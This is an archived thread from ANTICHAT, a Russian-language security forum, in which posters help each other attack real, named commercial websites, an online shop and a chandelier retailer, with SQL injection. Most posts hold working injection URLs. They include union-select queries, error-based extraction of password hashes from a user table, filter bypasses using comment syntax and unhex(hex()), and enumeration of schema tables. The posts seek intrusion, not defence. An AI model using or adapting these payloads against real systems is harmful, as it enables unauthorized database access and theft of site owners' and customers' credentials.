HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #18651  
Старый 27.11.2011, 11:45
tabletkO
Guest
Сообщений: n/a
Провел на форуме:
28093

Репутация: 11
По умолчанию

lightangel,

http://www.shopoldcoloradocity.com/content.php?id=-97/**/union/**/select/**/1,version(),3,4,user(),6,7,8,9,10,11,12--

Site filter symbol "+". But you can use /**/
 
Ответить с цитированием

  #18652  
Старый 27.11.2011, 13:37
Aniweste
Новичок
Регистрация: 28.05.2010
Сообщений: 0
Провел на форуме:
5422

Репутация: 0
По умолчанию

Цитата:
Сообщение от Boolean  
Boolean said:
LOAD_FILE('/путь/до/конфиг/апача');
Список можно посмотреть тут: /thread49775.html
Попробывал все - результат NULL

Есть ещё какие-нибудь варианты?
 
Ответить с цитированием

  #18653  
Старый 27.11.2011, 15:46
lion-art
Guest
Сообщений: n/a
Провел на форуме:
7046

Репутация: 1
По умолчанию

уважаемые знатоки

Доброго дня всем, люди кто нибудь сталкивался с такой ситуацией:

http://www.site.ru/ru/***/***/***/?nd_4=***&***_4=***&***_*=1'+and+(select+1+from(se lect+count(*),(select+concat(0x3a,password_md5,0x3 a)+from+AUTH_USER+limit+1,1),floor(rand(0)*2))+hav ing+min(0))+and+'1'='1

Message of provider: SQLSTATE[42000]: Syntax error or access violation: 1248 Every derived table must have its own alias.' in....

или как вариант запрос havij

http://www.site.ru/ru/***/***/***/?nd_4=***&***_4=***&***_*=1'+and(select+1+from(sel ect+count(*),concat((select+(select+(select+concat (password_md5)+from+AUTH_USER+limit+0,1))+from+inf ormation_schema.tables+limit+0,1),floor(rand(0)*2) )x+from+information_schema.tables+group+by+x)a)+an d+'1'='1

с ошибкой вида:

Subquery returns more than 1 row.' in
 
Ответить с цитированием

  #18654  
Старый 27.11.2011, 16:55
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906

Репутация: -14
По умолчанию

lion-art

Я не сталкивался. Попробуй заменить + на /*--*/ , /**/ и т.д
 
Ответить с цитированием

  #18655  
Старый 27.11.2011, 20:48
lightangel
Guest
Сообщений: n/a
Провел на форуме:
35174

Репутация: -6
По умолчанию

http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1' (SQL Error)

Cannot get order by, any solution?
 
Ответить с цитированием

  #18656  
Старый 27.11.2011, 22:06
lightangel
Guest
Сообщений: n/a
Провел на форуме:
35174

Репутация: -6
По умолчанию

Thank you, Ruslan1817.

I still have a problem.

http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1'+union+select+1,2,3,4, version(),6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20+--+

Then I get 5.1.41-3ubuntu12.10-log, but when I execute like this.

http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1%27+union+select+1,2,3, 4,group_concat(table_name),6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20+from+information_schema.tables%2 0where%20table_schema=database()+--+

And I get- Illegal mix of collations for operation 'UNION'

Why?
 
Ответить с цитированием

  #18657  
Старый 27.11.2011, 22:07
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

Цитата:
Сообщение от lightangel  
lightangel said:
Thank you, Ruslan1817.
I still have a problem.
http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1'+union+select+1,2,3,4, version(),6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20+--+
Then I get 5.1.41-3ubuntu12.10-log, but when I execute like this.
http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1%27+union+select+1,2,3, 4,group_concat(table_name),6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20+from+information_schema.tables%2 0where%20table_schema=database()+--+
Why?
http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1'+union+select+1,2,3,4, (%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(n ull)%66rom(%69nformation_schema.%63olumns)%77here( %74able_schema!=0x696e666f726d6174696f6e5f73636865 6d61)%61nd(0x00)%69n(@x:=%63oncat(@x,0x3c62723e,ta ble_schema,0x2e,table_name,0x3a,%63olumn_name))))x ),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+
 
Ответить с цитированием

  #18658  
Старый 27.11.2011, 22:18
lightangel
Guest
Сообщений: n/a
Провел на форуме:
35174

Репутация: -6
По умолчанию

Thanks, can you give me a guide or paper on how to move foward.
 
Ответить с цитированием

  #18659  
Старый 27.11.2011, 22:21
tabletkO
Guest
Сообщений: n/a
Провел на форуме:
28093

Репутация: 11
По умолчанию

Цитата:
Сообщение от lightangel  
lightangel said:
Thank you, Ruslan1817.
I still have a problem.
http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1'+union+select+1,2,3,4, version(),6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20+--+
Then I get 5.1.41-3ubuntu12.10-log, but when I execute like this.
http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1%27+union+select+1,2,3, 4,group_concat(table_name),6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20+from+information_schema.tables%2 0where%20table_schema=database()+--+
And I get- Illegal mix of collations for operation 'UNION'
Why?
er9j6@, nice but easy solution is unhex(hex())

Код HTML:
HTML:
http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=-1%27+union+select+1,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+limit+0,1--+1
And easy construction
 
Ответить с цитированием

  #18660  
Старый 27.11.2011, 22:33
lightangel
Guest
Сообщений: n/a
Провел на форуме:
35174

Репутация: -6
По умолчанию

Site has 34 tables, I found out doing this.

Код:
Code:
http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=-1%27+union+select+1,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+limit+33,1--+3
How do I get an info of a particular table?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ